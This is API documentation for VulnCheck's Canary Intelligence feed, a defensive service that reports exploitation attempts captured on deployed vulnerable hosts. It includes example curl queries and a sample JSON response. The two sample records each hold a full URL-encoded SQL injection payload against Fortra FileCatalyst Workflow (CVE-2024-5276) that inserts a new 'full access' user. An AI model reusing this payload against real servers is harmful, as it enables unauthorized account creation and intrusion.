Accessing Canary Data

VulnCheck Canary Intelligence provides exploitation data from globally deployed vulnerable hosts revealing the first signs of vulnerability exploitation and tracking which CVEs are being targeted in the wild, and by whom.

VulnCheck Canary Intelligence deploys actual vulnerable systems across the Internet, capturing real-world attacker behaviors and exploitation techniques in the wild. The data reveals which vulnerabilities are being targeted, how they’re being exploited, and by whom. Providing defenders with early and actionable intelligence.

Example Canary Record

The VulnCheck API makes it easy to get started with VulnCheck Canary Intelligence. To start, simply query the vulncheck-canaries index via the /v3/index/:index?cve=:cve API as follows:

curl --request GET \
    --url https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276 \
    --header 'Accept: application/json' \
    --header 'Authorization: Bearer insert_token_here'

The above example searches the vulncheck-canaries index for information on CVE-2024-5276.

Example API Response for vulncheck-canaries by CVE

After calling the /v3/index/vulncheck-canaries?cve=:cve API endpoint with a valid CVE identifier, a response similar to the below will be returned:

{
  "_benchmark": 0.039542,
  "_meta": {
    "timestamp": "2025-10-22T11:35:36.982964726Z",
    "index": "vulncheck-canaries",
    // ...
  },
  "data": [
    {
      "src_ip": "34.133.225.171",
      "src_port": 58376,
      "src_country": "US",
      "dst_country": "BR",
      "cve": "CVE-2024-5276",
      "signature_id": 12700349,
      "signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
      "category": "Web Application Attack",
      "severity": 1,
      "http": {
        "url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734cm3xr2dqiauaium96hrrzwmbd%27%2C+NULL%2C+%27986347D9E41AEE0835C341ED7DCA8B65%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdFirstName%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734cm3xr2dqiauaium96hrrzwmbd%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
        "http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
        "protocol": "HTTP/1.1"
      },
      "timestamp": "2025-10-17T18:32:24.338Z"
    },
    {
      "src_ip": "34.16.7.161",
      "src_port": 48334,
      "src_country": "US",
      "dst_country": "BR",
      "cve": "CVE-2024-5276",
      "signature_id": 12700349,
      "signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
      "category": "Web Application Attack",
      "severity": 1,
      "http": {
        "url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734ckkpr2kyqyslshjzytmsobunu%27%2C+NULL%2C+%277CE0027ED69C7ECA40D38289F18C6036%27%2C+%2734ckkpr2kyqyslshjzytmsobunuFirstName%27%2C+%2734ckkpr2kyqyslshjzytmsobunuLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734ckkpr2kyqyslshjzytmsobunu%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
        "http_user_agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
        "protocol": "HTTP/1.1"
      },
      "timestamp": "2025-10-17T18:17:55.908Z"
    }
  ]
}

Example API Queries

VulnCheck Canary Intelligence supports a wide range of use cases.

A CVE Being Exploited on a Specific Date

By combining two of the API query parameters (CVE and Date) we can quickly zoom in on a CVE being exploited on a specific date.

curl --request GET \
    --url https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276&date=2025-10-17 \
    --header 'Accept: application/json' \
    --header 'Authorization: Bearer insert_token_here'

API Query Parameters

VulnCheck Canary Intelligence makes it easy to query our canary data set with a number of API query parameters, useful for filtering the results. Supported API query parameters are as follows:

Query ParameterDescription
cveFilter based on CVE ID
src_countryFilter based on the attacks originating from a source country
dst_countryFilter based on the attacks on the destiny country

Offline Backups Available

Offline BackupDescription
vulncheck-canaries-3dCanary Intelligence detections for the past 3 days
vulncheck-canaries-10dCanary Intelligence detections for the past 10 days
vulncheck-canaries-30dCanary Intelligence detections for the past 30 days
vulncheck-canaries-90dCanary Intelligence detections for the past 90 days

To request a specific offline backup, simply call /v3/backup/:index as follows (vulncheck-canaries-3d shown below):

curl --request GET \
    --url https://api.vulncheck.com/v3/backup/vulncheck-canaries-3d \
    --header 'Accept: application/json' \
    --header 'Authorization: Bearer insert_token_here'

Canary Intelligence

API Overview